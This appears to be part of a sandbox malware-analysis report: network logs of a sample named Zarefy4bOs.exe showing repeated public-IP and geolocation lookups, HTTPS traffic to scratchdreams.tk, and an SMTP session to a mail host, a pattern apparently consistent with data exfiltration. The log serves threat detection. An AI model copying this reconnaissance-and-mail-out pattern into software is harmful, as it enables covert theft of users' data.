                                                                    Apr 8, 2024 10:03:00.823163033 CEST49709443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:00.823187113 CEST44349709104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:01.119183064 CEST44349709104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:01.119285107 CEST44349709104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:01.119340897 CEST49709443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:01.119889021 CEST49709443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:01.124775887 CEST4971080192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:01.366841078 CEST8049710193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:01.366960049 CEST4971080192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:01.367100954 CEST4971080192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:01.609117985 CEST8049710193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:01.611212969 CEST8049710193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:01.612401009 CEST49711443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:01.612435102 CEST44349711104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:01.612498045 CEST49711443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:01.612744093 CEST49711443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:01.612756014 CEST44349711104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:01.662035942 CEST4971080192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:01.870656967 CEST44349711104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:01.872411966 CEST49711443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:01.872431040 CEST44349711104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:02.170308113 CEST44349711104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:02.170416117 CEST44349711104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:02.170494080 CEST49711443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:02.171030998 CEST49711443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:02.174384117 CEST4971080192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:02.175487041 CEST4971280192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:02.412379026 CEST8049712193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:02.412467003 CEST4971280192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:02.412601948 CEST4971280192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:02.416831017 CEST8049710193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:02.416894913 CEST4971080192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:02.649599075 CEST8049712193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:02.651235104 CEST8049712193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:02.652510881 CEST49713443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:02.652554035 CEST44349713104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:02.652621031 CEST49713443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:02.653050900 CEST49713443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:02.653065920 CEST44349713104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:02.693281889 CEST4971280192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:02.909548044 CEST44349713104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:02.911125898 CEST49713443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:02.911151886 CEST44349713104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:03.208363056 CEST44349713104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:03.208487988 CEST44349713104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:03.208550930 CEST49713443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:03.209127903 CEST49713443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:03.212634087 CEST4971280192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:03.213859081 CEST4971480192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:03.449671030 CEST8049712193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:03.449774027 CEST4971280192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:03.455389023 CEST8049714193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:03.455496073 CEST4971480192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:03.455678940 CEST4971480192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:03.697280884 CEST8049714193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:04.699583054 CEST8049714193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:04.701189995 CEST49715443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:04.701227903 CEST44349715104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:04.701293945 CEST49715443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:04.701596975 CEST49715443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:04.701611042 CEST44349715104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:04.740226030 CEST4971480192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:04.959300995 CEST44349715104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:04.961036921 CEST49715443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:04.961057901 CEST44349715104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:05.256786108 CEST44349715104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:05.256875038 CEST44349715104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:05.256920099 CEST49715443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:05.257496119 CEST49715443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:05.261332989 CEST4971480192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:05.262800932 CEST4971680192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:05.502966881 CEST8049714193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:05.503055096 CEST4971480192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:05.504618883 CEST8049716193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:05.504687071 CEST4971680192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:05.504890919 CEST4971680192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:05.746809006 CEST8049716193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:07.132369995 CEST8049716193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:07.133759022 CEST49717443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:07.133795977 CEST44349717104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:07.133887053 CEST49717443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:07.134130001 CEST49717443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:07.134140968 CEST44349717104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:07.177736998 CEST4971680192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:07.391735077 CEST44349717104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:07.393260956 CEST49717443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:07.393286943 CEST44349717104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:07.688474894 CEST44349717104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:07.688599110 CEST44349717104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:07.688699007 CEST49717443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:07.689354897 CEST49717443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:07.692905903 CEST4971680192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:07.694168091 CEST4971880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:07.931200027 CEST8049718193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:07.931337118 CEST4971880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:07.931536913 CEST4971880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:07.935656071 CEST8049716193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:07.935738087 CEST4971680192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:08.168643951 CEST8049718193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:08.475114107 CEST8049718193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:08.476480007 CEST49719443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:08.476531029 CEST44349719104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:08.476715088 CEST49719443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:08.477020979 CEST49719443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:08.477030993 CEST44349719104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:08.521387100 CEST4971880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:08.736641884 CEST44349719104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:08.738500118 CEST49719443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:08.738523960 CEST44349719104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:09.035382032 CEST44349719104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:09.035491943 CEST44349719104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:09.035552979 CEST49719443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:09.036128044 CEST49719443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:09.047113895 CEST4971880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:09.284634113 CEST8049718193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:09.284734964 CEST4971880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:09.440977097 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:09.441020012 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:09.441104889 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:09.441603899 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:09.441626072 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:09.707825899 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:09.707962036 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:09.711285114 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:09.711294889 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:09.711579084 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:09.713305950 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:09.756232023 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:40.856298923 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:40.856373072 CEST44349720104.21.27.85192.168.2.5
                                                                    Apr 8, 2024 10:03:40.856522083 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:40.897336960 CEST49720443192.168.2.5104.21.27.85
                                                                    Apr 8, 2024 10:03:46.387043953 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:46.583738089 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:46.583846092 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:47.095187902 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:47.146344900 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:47.361692905 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:47.558557987 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:47.558579922 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:47.562429905 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:47.762252092 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:47.802628040 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:48.956451893 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.157191992 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:49.157516956 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.358012915 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:49.358366966 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.573837042 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:49.574067116 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.772804976 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:49.773591995 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.773665905 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.773684978 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.773704052 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:03:49.969856977 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:49.970089912 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:50.093750000 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:03:50.146392107 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:04:05.561872005 CEST8049708193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:04:05.561943054 CEST4970880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:05:26.598421097 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:05:26.796036005 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:05:26.796065092 CEST58749728208.91.199.225192.168.2.5
                                                                    Apr 8, 2024 10:05:26.796137094 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:05:26.796235085 CEST49728587192.168.2.5208.91.199.225
                                                                    Apr 8, 2024 10:05:26.992697954 CEST58749728208.91.199.225192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 8, 2024 10:02:57.206253052 CEST6361953192.168.2.51.1.1.1
                                                                    Apr 8, 2024 10:02:57.330614090 CEST53636191.1.1.1192.168.2.5
                                                                    Apr 8, 2024 10:02:58.572525978 CEST4986353192.168.2.51.1.1.1
                                                                    Apr 8, 2024 10:02:58.697789907 CEST53498631.1.1.1192.168.2.5
                                                                    Apr 8, 2024 10:03:09.047684908 CEST5377153192.168.2.51.1.1.1
                                                                    Apr 8, 2024 10:03:09.440099955 CEST53537711.1.1.1192.168.2.5
                                                                    Apr 8, 2024 10:03:46.258917093 CEST6481453192.168.2.51.1.1.1
                                                                    Apr 8, 2024 10:03:46.384594917 CEST53648141.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Apr 8, 2024 10:02:57.206253052 CEST192.168.2.51.1.1.10xb45cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:58.572525978 CEST192.168.2.51.1.1.10x530Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:09.047684908 CEST192.168.2.51.1.1.10xe30Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:46.258917093 CEST192.168.2.51.1.1.10xb3a5Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Apr 8, 2024 10:02:57.330614090 CEST1.1.1.1192.168.2.50xb45cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:57.330614090 CEST1.1.1.1192.168.2.50xb45cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:57.330614090 CEST1.1.1.1192.168.2.50xb45cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:57.330614090 CEST1.1.1.1192.168.2.50xb45cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:57.330614090 CEST1.1.1.1192.168.2.50xb45cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:57.330614090 CEST1.1.1.1192.168.2.50xb45cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:58.697789907 CEST1.1.1.1192.168.2.50x530No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:02:58.697789907 CEST1.1.1.1192.168.2.50x530No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:09.440099955 CEST1.1.1.1192.168.2.50xe30No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:09.440099955 CEST1.1.1.1192.168.2.50xe30No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:46.384594917 CEST1.1.1.1192.168.2.50xb3a5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:46.384594917 CEST1.1.1.1192.168.2.50xb3a5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:46.384594917 CEST1.1.1.1192.168.2.50xb3a5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                    Apr 8, 2024 10:03:46.384594917 CEST1.1.1.1192.168.2.50xb3a5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                    • reallyfreegeoip.org
                                                                    • scratchdreams.tk
                                                                    • checkip.dyndns.org
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549705193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:02:57.577605963 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Apr 8, 2024 10:02:58.277544022 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:02:58 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5033b81ecc6418b96ea9196094e0176f
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                    Apr 8, 2024 10:02:58.282962084 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Apr 8, 2024 10:02:58.521754026 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:02:58 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 837a5cc2a0f6b097fdb8f0b0735c59be
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                    Apr 8, 2024 10:02:59.272654057 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Apr 8, 2024 10:02:59.511491060 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:02:59 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5a8f45a39d923dc0bd80fd852f612757
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549708193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:03:00.322504997 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Apr 8, 2024 10:03:00.561847925 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:00 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: d2bded719dd51b96ce9f4d5768495e8a
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549710193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:03:01.367100954 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Apr 8, 2024 10:03:01.611212969 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:01 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 573faec38816dac1d70bfefc0ef9cdf4
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549712193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:03:02.412601948 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Apr 8, 2024 10:03:02.651235104 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:02 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: da9a798a647ab56b6eba6f25f1298cad
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549714193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:03:03.455678940 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Apr 8, 2024 10:03:04.699583054 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:04 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 6f6c7a61ef0ac0599be6450613fd382b
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549716193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:03:05.504890919 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
